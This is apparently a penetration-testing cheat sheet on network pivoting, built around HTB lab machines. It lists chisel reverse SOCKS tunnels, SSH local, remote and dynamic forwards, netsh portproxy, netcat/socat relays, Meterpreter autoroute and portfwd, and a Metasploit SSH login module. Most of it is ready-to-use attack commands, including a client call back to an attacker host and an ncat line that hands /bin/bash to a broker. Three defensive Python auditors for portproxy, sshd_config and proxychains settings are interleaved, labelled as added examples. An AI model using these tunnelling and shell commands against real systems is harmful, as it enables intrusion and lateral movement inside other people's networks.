PIVOTING:

Pivot 

Chisel :

################################# Attacker Machine ######################## 
./chisel server -p 8080 --reverse  
#################################### Pivot Machine ########################  
chisel.exe client attacker_ip:8080 R:socks  
############################### Proxychains.conf ##########################  
socks5 127.0.0.1 1080
################################## Nmap Scan ##############################  
Always better to transfer binaries and scan from the pivot  
nmap.exe -sC -sV 10.10.10.10 -Pn -T5 // From Pivot machine  
proxychains nmap 10.10.10.10 -T5 -Pn -sT // From Kali Machine 
################################### Gobuster ##############################  
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/direct  




Pivot via SSH key (HTB Nibbles) 

  ssh -i root.key -L9000:web_ip:port ssh_ip 
    Ex : ssh -i root.key -L9000:10.10.10.75:80 10.10.10.73 




Pivot via root password (HTB Sense) 

  ssh -D1080 pivot_ip 
  Burp -> user options -> socks proxy -> use socks proxy 
  vi /etc/proxychains.conf 
  Change socks4(metasploit) to socks5(ssh)
  proxychains curl -k https://10.10.10.60 [ -k to ignore SSL]






netsh Port Proxy:
pivot c:\> netsh interface portproxy add v4tov4 listenport=4000 listenaddress=0.0.0.0 connectport=22 connectaddress=victim.tgt
attacker $ ssh victimadmin@pivot.tgt -p 4000
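From the defender's side, a portproxy entry like the one above is a persistent, network-reachable listener that an inventory script can pick out. The following Python is an added example (not part of this cheat sheet and not a Microsoft tool): it parses constructed `netsh interface portproxy show all` output, mirroring netsh's table layout, and flags forwards bound to every interface. The sample output, the function names and the column regex are assumptions made for the example.

```python
import re

# Constructed sample of 'netsh interface portproxy show all' output
# (not captured from a real host; the layout mirrors netsh's table format).
SAMPLE_OUTPUT = """\
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         4000        victim.tgt      22
127.0.0.1       5000        10.10.10.5      3389

Listen on ipv6:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
::              4001        10.10.10.7      22
"""

# Section header gives the address families, data rows are addr port addr port.
HEADER_RE = re.compile(r"^Listen on (ipv[46]):\s+Connect to (ipv[46]):", re.I)
ROW_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")
ALL_INTERFACES = {"0.0.0.0", "::", "*"}


def parse_portproxy(text):
    """Turn 'netsh interface portproxy show all' output into a list of
    {mode, listen_addr, listen_port, connect_addr, connect_port} dicts.
    mode follows netsh's own naming, e.g. 'v4tov4' or 'v6tov4'."""
    entries, mode = [], None
    for raw in text.splitlines():
        line = raw.strip()
        header = HEADER_RE.match(line)
        if header:
            # 'ipv4' -> 'v4', so 'Listen on ipv6 / Connect to ipv4' -> 'v6tov4'
            mode = f"{header.group(1)[2:].lower()}to{header.group(2)[2:].lower()}"
            continue
        row = ROW_RE.match(line)
        if row and mode:
            entries.append({
                "mode": mode,
                "listen_addr": row.group(1), "listen_port": int(row.group(2)),
                "connect_addr": row.group(3), "connect_port": int(row.group(4)),
            })
    return entries


def exposed_forwards(entries):
    """Forwards bound to every interface: reachable from the network, which
    is what makes a portproxy pivot useful and also what makes it stand out."""
    return [e for e in entries if e["listen_addr"] in ALL_INTERFACES]


def describe(entry):
    """One-line summary in 'listen -> connect [mode]' form."""
    return (f"{entry['listen_addr']}:{entry['listen_port']} -> "
            f"{entry['connect_addr']}:{entry['connect_port']} [{entry['mode']}]")


if __name__ == "__main__":
    for e in exposed_forwards(parse_portproxy(SAMPLE_OUTPUT)):
        print("exposed portproxy:", describe(e))
```

On a live host the same configuration is persisted in the registry under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy`, so an endpoint agent can watch that key rather than polling netsh; a forward whose connect port is 22 or 3389 and whose listen address is 0.0.0.0 is the pattern the cheat sheet's netsh one-liner produces.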





SSH trail through Linux:
attacker $ ssh pivotAdmin@pivot.tgt
pivot $ ssh victimAdmin@victim.tgt





PowerShell sessions through Windows:
attacker PS C:\> Enter-PSSession -ComputerName pivot.tgt
Or RDP session over Windows:
attacker c:\> mstsc.exe /v:pivot.tgt
Or psexec.exe
Now, with command execution on pivot:
pivot C:\> ssh victimadmin@victim.tgt
No SSH available? How about PuTTY?






SSH Pivots Require an sshd Setting:
Set GatewayPorts yes in /etc/ssh/sshd_config, then:
pivot # systemctl restart sshd
(GatewayPorts governs whether -R listeners on the pivot bind beyond loopback; forwarding itself also needs AllowTcpForwarding, which is on by default.)

SSH Local Port Forward:
attacker $ ssh -fNL 1337:victim.tgt:22 pivoter@pivot.tgt
attacker $ ssh victimadmin@localhost -p 1337

SSH Remote Port Forward:
attacker $ ssh -fNR 4000:victim.tgt:22 pivoter@pivot.tgt
attacker $ ssh victimadmin@pivot.tgt -p 4000
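The sshd_config keywords above decide whether a host can serve as an SSH pivot at all, so the defender-side check is to audit them rather than the tunnel commands. The following Python is an added example, not from this cheat sheet or from OpenSSH: it reads a constructed sshd_config, applies the defaults documented in sshd_config(5) for keywords that are absent, reports forwarding keywords whose effective global value is not "no", and lists Match blocks that override a keyword per user or group. The sample config and the function names are assumptions.

```python
import re

# Constructed sample sshd_config (not taken from any real host).
SAMPLE_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
AllowTcpForwarding yes
GatewayPorts yes
#PermitTunnel yes
Match User backup
    AllowTcpForwarding no
"""

# Defaults from sshd_config(5) that apply when the keyword is absent.
DEFAULTS = {
    "allowtcpforwarding": "yes",  # yes | no | local | remote
    "gatewayports": "no",         # no | yes | clientspecified
    "permittunnel": "no",         # no | yes | point-to-point | ethernet
}


def parse_sshd_config(text):
    """Split sshd_config text into global settings and Match blocks.

    Returns (global_settings, match_blocks): global_settings maps
    lower-cased keyword -> lower-cased value for lines before the first
    Match; match_blocks is a list of (criteria, {keyword: value}).
    Blank lines and lines starting with '#' are ignored, as sshd does.
    """
    global_settings, match_blocks = {}, []
    current = global_settings
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Keyword and argument are separated by whitespace or a single '='.
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) == 2 else ""
        if key == "match":
            current = {}
            match_blocks.append((value, current))
            continue
        current[key] = value.lower()
    return global_settings, match_blocks


def audit_forwarding(text):
    """Report forwarding keywords whose effective global value is not 'no'.

    Returns [(keyword, effective_value, source)] where source is
    'explicit' when the file sets the keyword and 'default' otherwise.
    """
    global_settings, _ = parse_sshd_config(text)
    findings = []
    for key, default in DEFAULTS.items():
        if key in global_settings:
            value, source = global_settings[key], "explicit"
        else:
            value, source = default, "default"
        if value != "no":
            findings.append((key, value, source))
    return findings


def match_overrides(text, keyword):
    """List (criteria, value) for Match blocks that override a keyword.

    A global 'no' can be re-enabled per user/group/host inside Match,
    and a global 'yes' can be switched off the same way.
    """
    key = keyword.lower()
    _, blocks = parse_sshd_config(text)
    return [(criteria, values[key]) for criteria, values in blocks if key in values]


if __name__ == "__main__":
    for key, value, source in audit_forwarding(SAMPLE_SSHD_CONFIG):
        print(f"{key} = {value} ({source}): host can be used as an SSH pivot")
    print("Match overrides:", match_overrides(SAMPLE_SSHD_CONFIG, "AllowTcpForwarding"))
```

Run it against `/etc/ssh/sshd_config` on a host that should never relay traffic and expect an empty finding list; note that an empty file still yields a finding for AllowTcpForwarding because OpenSSH's default is "yes".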







ProxyChains:
attacker $ ssh pivotadmin@pivot.tgt -D 9050 -fN
attacker $ proxychains ssh victimadmin@victim.tgt
And check /etc/proxychains.conf




Some SSH Command Line Options:
-f put ssh in the background after connecting
-N don't execute a command; just forward some ports
-p num connect to port "num" on the ssh server (lowercase; uppercase -P is scp's port flag, not ssh's)




Netcat Port Forward:
pivot $ cd /tmp && mknod backpipe p
pivot $ nc -lvp 4000 0<backpipe | nc -v victim.tgt 22 1>backpipe
attacker $ ssh victimadmin@pivot.tgt -p 4000


Meterpreter Port Forward:
pivot Meterpreter > portfwd add -l 4000 -p 22 -r victim.tgt
attacker $ ssh victimadmin@pivot.tgt -p 4000





Metasploit/Meterpreter Autoroute:
pivot Meterpreter > run post/multi/manage/autoroute SUBNET=pivotSubnet CMD=add
pivot Meterpreter > background
pivot msf > use scanner/ssh/ssh_login
pivot msf > set RHOSTS victim.tgt
pivot msf > set USERNAME victimAdmin
pivot msf > set PASSWORD victimPass
pivot msf > run






Socat Port Forward:
pivot $ socat TCP-LISTEN:4000,fork TCP:victim.tgt:22
attacker $ ssh victimadmin@pivot.tgt -p 4000





Ncat Connection Brokering:
Assumes code execution on victim
pivot $ ncat -vlp 4000 --broker
victim $ ncat pivot.tgt 4000 -e /bin/bash
attacker $ ncat pivot.tgt 4000







Method 1: Pivot with SSH and ProxyChains
This method uses SSH dynamic port forwarding (-D) to open a SOCKS proxy on the attacker's side, and proxychains to push tools that have no native SOCKS support through that proxy.



Setting up the tunnel
First login with SSH using dynamic port forwarding.
ssh -D localhost:9000 -f -N pentester@localhost -p 20022



Setup ProxyChains
In /etc/proxychains4.conf, add the following to the end of the file:
socks5 127.0.0.1 9000



$ proxychains nmap -sV webgoat





Method 2: Pivot With Meterpreter and socks proxy
Setup the connection and run a socks proxy over meterpreter:
docker exec -it pivots_metasploit_1 /bin/bash

$ proxychains nmap -sT -P0 -p8080,9001 172.20.0.3





Method 3: Pivot over a Ncat or Netcat relay
Tunnel as http proxy with ncat


## Target machine - setup ncat listener 
ncat -vv --listen 3128 --proxy-type http



## attacker machine (metasploit)
$ tail /etc/proxychains.conf -n 3

proxychains nmap -sT -P0 -p8080,9001 172.20.0.2




Reverse tunnel a single port with ncat

# On attacker / metasploit machine
$ docker exec -it pivots_metasploit_1 /bin/bash

$ ncat -lv --broker -m2 8080





# On ssh / box to pivot from
$ ssh pentester@localhost -p 20022
ncat -v metasploit 8080 -c "ncat -v webgoatlocal 8080"




Tunnel with netcat:
# Make backpipe to pass data around
mknod pivot p
# Setup the listener on pivot machine - forward traffic the
# pivot machine receives on port 8080 to the webgoat server 
# port 8080
nc -l -p 8080 0<pivot | nc webgoatlocal 8080 1>pivot



## On attacker machine (metasploit)
root@12f888991729:/$ wget ssh:8080/WebGoat
Saving to: ‘WebGoat’




Method: Installing tools on the target machine:




SSH pivot
ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>





Metasploit with Meterpreter
msf5 > route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
[*] Route added
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j





Ncat HTTP proxy
$ ncat -vv --listen 3128 --proxy-type http

Ncat Port Forwarder

On attacker machine:
$ ncat -lv --broker -m2 <port>

On pivot machine:
$ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target>"





Netcat Port Forwarder

On pivot machine:
mknod pivot p
nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot




Proxychains Setup

Install and configure proxychains
tail /etc/proxychains.conf
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128
#<type: http/socks4/socks5> <proxy_host> <proxy_port>
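The [ProxyList] format shown above (and used in the chisel and SSH -D sections earlier) is simple enough that a mistake such as an extra token or a typo in the proxy type only surfaces as a silent connection failure. The following Python is an added example, not part of this cheat sheet or of the proxychains project: it parses a constructed proxychains.conf, records the chain mode, validates each [ProxyList] entry and returns the hop list in the order strict_chain would use. The sample file, the function names and the treatment of `#` as a comment anywhere on a line are assumptions made for the example.

```python
import ipaddress

# Constructed sample conf; the commented socks4 line is the stock default entry,
# and the 'socks5 ... 1080 1112' and 'socks6' lines are deliberately malformed.
SAMPLE_CONF = """\
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# <type: http/socks4/socks5> <proxy_host> <proxy_port> [user pass]
#socks4 127.0.0.1 9050
http 172.21.0.3  3128
socks5 127.0.0.1 1080 1112
socks5 127.0.0.1 9000 user pass
socks6 10.0.0.1 1080
"""

VALID_TYPES = {"http", "socks4", "socks5"}
CHAIN_MODES = {"strict_chain", "dynamic_chain", "random_chain", "round_robin_chain"}


def parse_proxychains(text):
    """Parse proxychains.conf text.

    Returns (chain_mode, proxies, errors):
      chain_mode: the *_chain keyword found before [ProxyList], or None
      proxies:    [{type, host, port, auth, host_is_ip}] in file order
      errors:     [(line_no, reason)] for malformed [ProxyList] entries
    Text after '#' is treated as a comment on every line.
    """
    chain_mode, proxies, errors = None, [], []
    in_list = False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.lower() == "[proxylist]":
            in_list = True
            continue
        if not in_list:
            if line in CHAIN_MODES:
                chain_mode = line
            continue
        fields = line.split()
        if len(fields) not in (3, 5):
            errors.append((no, "expected '<type> <host> <port>' or "
                               "'<type> <host> <port> <user> <pass>'"))
            continue
        ptype, host, port = fields[0].lower(), fields[1], fields[2]
        if ptype not in VALID_TYPES:
            errors.append((no, f"unknown proxy type {ptype!r}"))
            continue
        if not port.isdigit() or not 1 <= int(port) <= 65535:
            errors.append((no, f"invalid port {port!r}"))
            continue
        try:
            ipaddress.ip_address(host)
            host_is_ip = True
        except ValueError:
            host_is_ip = False  # a hostname; worth a second look
        proxies.append({"type": ptype, "host": host, "port": int(port),
                        "auth": (fields[3], fields[4]) if len(fields) == 5 else None,
                        "host_is_ip": host_is_ip})
    return chain_mode, proxies, errors


def chain_hops(text):
    """Hop list as 'type://host:port', in the order strict_chain traverses it."""
    _, proxies, _ = parse_proxychains(text)
    return [f"{p['type']}://{p['host']}:{p['port']}" for p in proxies]


if __name__ == "__main__":
    mode, proxies, errors = parse_proxychains(SAMPLE_CONF)
    print("mode:", mode)
    print("hops:", chain_hops(SAMPLE_CONF))
    for line_no, reason in errors:
        print(f"line {line_no}: {reason}")
```

Point it at the real file with `parse_proxychains(open("/etc/proxychains.conf").read())` before relying on a chain; an entry that lands in `errors` is one proxychains would not use as intended.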




Dynamic SSH Pivoting Command using proxy chains
  ssh -D 127.0.0.1:9050 root@192.168.2.2



Meterpreter Pivoting Cheatsheet:

portfwd add -l 3389 -p 3389 -r target-host               Forwards local port 3389 (RDP) to port 3389 on target-host through the compromised machine running the Meterpreter shell

portfwd delete -l 3389 -p 3389 -r target-host            Removes the port forward added above

portfwd flush                                            Meterpreter delete all port forwards

portfwd list                                             Meterpreter list active port forwards

run autoroute -s 192.168.15.0/24                         Use Meterpreter's autoroute script to add the route for the specified subnet 192.168.15.0/24

run autoroute -p                                         Meterpreter list all active routes

route                                                    Meterpreter view available networks the compromised host can access

route add 192.168.14.0 255.255.255.0 3                   Meterpreter add route for 192.168.14.0/24 via Session 3

route delete 192.168.14.0 255.255.255.0 3                Meterpreter delete route for 192.168.14.0/24 via Session 3

route flush                                              Meterpreter delete all routes


In order to connect to the compromised machine you would run:

Connect to RDP via Meterpreter Port Forward
rdesktop 127.0.0.1


